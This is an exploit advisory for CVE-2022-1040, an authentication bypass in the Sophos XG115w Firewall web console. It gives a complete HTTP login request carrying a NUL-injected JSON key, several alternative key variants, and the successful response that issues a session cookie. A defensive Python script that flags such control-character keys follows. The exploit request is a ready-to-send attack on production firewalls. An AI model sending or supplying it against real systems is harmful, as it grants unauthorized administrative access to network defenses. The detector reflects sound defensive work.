Sophos XG115w Firewall 17.0.10 MR-10 Authentication Bypass
Sophos XG115w Firewall version 17.0.10 MR-10 suffers from an authentication bypass vulnerability.
# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
# Date: 2022-08-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sophos.com
# Version: 17.0.10 MR-10
# Tested on: Windows 11
# CVE : CVE-2022-1040

# [ VULNERABILITY DETAILS ] :
# This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication.

# [ SAMPLE REQUEST ] :

POST /webconsole/Controller HTTP/1.1
Host: 127.0.0.1:4444
Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: https://127.0.0.1:4444
Referer: https://127.0.0.1:4444/webconsole/webpages/login.jsp
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066

# [ KEY MODE ] : \u0000eb ,\u0000fc , \u0000 ,\u0000ef ,...

# [ Successful response ] :

HTTP/1.1 200 OK
Date: Thu, 04 Aug 2022 17:06:39 GMT
Server: xxxx
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 53
Set-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnly
Connection: close

{"redirectionURL":"/webpages/index.jsp","status":200}
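As an added example that is not part of the advisory or of Sophos' own code: a Python check, in the spirit of a WAF rule or a log-review script, that flags login requests to /webconsole/Controller whose JSON keys decode to strings containing control characters such as the \u0000 escape seen in the sample request above. The function names and the two sample bodies are constructed for this example.

```python
"""Flag webconsole login requests whose JSON keys carry control characters.

Added example (not the advisory's or vendor's code). A key such as
"mode\\u0000ef" only reveals the NUL after JSON decoding, so the check
inspects decoded keys rather than the raw body text.
"""
import json
from urllib.parse import parse_qs

# Constructed sample bodies: the first mirrors the advisory's request shape,
# the second is an ordinary login body with plain keys.
SUSPICIOUS_BODY = (
    'mode=151&json={"username"%3a"admin","password"%3a"x","languageid"%3a"1",'
    '"browser"%3a"Chrome_101","accessaction"%3a1,+"mode\\u0000ef"%3a716}'
    '&__RequestType=ajax&t=1653896534066'
)
BENIGN_BODY = (
    'mode=151&json={"username"%3a"admin","password"%3a"x","languageid"%3a"1",'
    '"browser"%3a"Chrome_101","accessaction"%3a1}&__RequestType=ajax&t=1'
)


def control_char_keys(body: str) -> list[str]:
    """Return the decoded JSON keys of the form's `json` field that contain
    any character below U+0020 (NUL, tab, newline, ...)."""
    fields = parse_qs(body, keep_blank_values=True)  # %3a -> ':', '+' -> ' '
    raw_json = fields.get("json", [""])[0]
    try:
        obj = json.loads(raw_json)  # turns the \u0000 escape into a real NUL
    except json.JSONDecodeError:
        return ["<unparseable json field>"]  # malformed is itself suspicious
    if not isinstance(obj, dict):
        return []
    return [k for k in obj if any(ord(c) < 0x20 for c in k)]


def inspect_request(raw: str) -> dict:
    """Classify one raw HTTP request text (CRLF-delimited, as captured).

    Only POST requests to /webconsole/Controller are in scope; for those the
    flagged key list is returned so a reviewer can see what was in the body.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, _, rest = request_line.partition(" ")
    path = rest.split(" ", 1)[0]
    if method != "POST" or not path.startswith("/webconsole/Controller"):
        return {"in_scope": False, "flagged_keys": []}
    return {"in_scope": True, "flagged_keys": control_char_keys(body)}
```

A hit on `flagged_keys` is a strong indicator to review alongside the `Set-Cookie` and `redirectionURL` response shown above, since a legitimate login form never emits control characters inside a JSON key.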